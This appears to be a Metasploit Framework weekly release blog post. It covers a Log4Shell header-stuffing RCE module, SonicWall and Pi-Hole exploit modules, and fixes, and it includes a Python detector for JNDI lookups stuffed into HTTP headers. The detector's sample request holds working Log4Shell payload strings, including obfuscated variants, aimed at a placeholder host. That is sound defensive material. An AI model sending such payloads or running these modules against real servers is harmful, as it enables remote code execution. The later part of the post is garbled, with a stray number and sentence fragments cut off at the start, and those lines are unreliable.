Log4Shell made for an unfortunate end to 2021 for many organizations, but it also makes for some great additions to Metasploit Framework. Contributors sempervictus, schierlm, righel, timwr and our very own Spencer McIntyre have collaborated to bring us a Log4Shell module that uses header stuffing to exploit vulnerable HTTP servers, resulting in Remote Code Execution.
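Header stuffing means the same JNDI lookup is placed in many HTTP headers at once so that whichever one the application logs reaches Log4j. The detection below is an added example written for this post, not code from the Metasploit module: it parses a constructed raw request, collapses the common nested-lookup obfuscations, and reports which headers carry a lookup so a defender can see the stuffing pattern in captured traffic.

```python
import re

# Collapse the simple nested lookups used to disguise the "jndi" scheme:
#   ${lower:j} / ${upper:J}  -> j / J
#   ${::-j}, ${env:NOPE:-j}   -> j   (default-value syntax)
NESTED_LOOKUP = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}"   # group 1: ${lower:x} / ${upper:x}
    r"|\$\{[^${}]*:-([^${}]*)\}",        # group 2: ${anything:-default}
    re.IGNORECASE,
)

def normalize(value: str) -> str:
    """Repeatedly resolve nested lookups until the string stops changing."""
    prev = None
    while prev != value:
        prev = value
        value = NESTED_LOOKUP.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), value
        )
    return value

def parse_headers(raw_request: str) -> dict:
    """Split a raw HTTP/1.1 request into {header-name: value}; the body is ignored."""
    head = raw_request.partition("\r\n\r\n")[0]
    headers = {}
    for line in head.split("\r\n")[1:]:      # skip the request line
        name, _, val = line.partition(":")
        headers[name.strip()] = val.strip()
    return headers

def find_jndi_headers(raw_request: str) -> list:
    """Names of headers carrying a JNDI lookup, in the order they appear."""
    return [
        name for name, val in parse_headers(raw_request).items()
        if "${jndi:" in normalize(val).lower()
    ]

# Constructed sample request: the same lookup stuffed into several headers,
# two of them obfuscated. Hostnames are placeholders, not real indicators.
SAMPLE_REQUEST = (
    "GET /login HTTP/1.1\r\n"
    "Host: app.example.test\r\n"
    "User-Agent: ${jndi:ldap://example.invalid/a}\r\n"
    "Accept: */*\r\n"
    "X-Forwarded-For: ${${lower:j}ndi:ldap://example.invalid/a}\r\n"
    "Referer: ${${::-j}${::-n}${::-d}${::-i}:ldap://example.invalid/a}\r\n"
    "X-Api-Version: 1.0\r\n\r\n"
)

if __name__ == "__main__":
    print(find_jndi_headers(SAMPLE_REQUEST))  # ['User-Agent', 'X-Forwarded-For', 'Referer']
```

Several hits on one request is the header-stuffing signature; a single hit in a rarely logged header is still worth an alert.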
Rapid7 disclosed the technical details of five vulnerabilities discovered by jbaines-r7 affecting SonicWall's SMA-100 series of SSL VPN devices. The disclosure included landing a Metasploit module that gives remote, authenticated attackers root access to the device using CVE-2021-20039.
An exciting new addition has worked its way into Metasploit Framework this week. Contributor h00die has created an authenticated RCE module that takes advantage of improper escaping of characters in Pi-Hole's Top Domains API's validDomainWildcard field. h00die has also created a library that aims to make developing future Pi-Hole modules easier.
5.5
This also introduces a Pi-Hole library for common functionality required in exploits against the service.
character which acts as a terminator when passed to a call to system(). An authenticated attacker can execute arbitrary commands as the root user.

vmware_vcenter_vmdir_auth_bypass module to create an admin user even if the target is not vulnerable to CVE-2020-3952, assuming we have obtained valid credentials to the vCenter LDAP directory.

auxiliary/scanner/dcerpc/hidden module where the RHOSTS datastore option was not available, resulting in hosts not being scanned.

generate command. Completion now works with both the -f and -o flags.

auxiliary/scanner/http/wordpress_scanner.rb module when attempting to scan themes

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).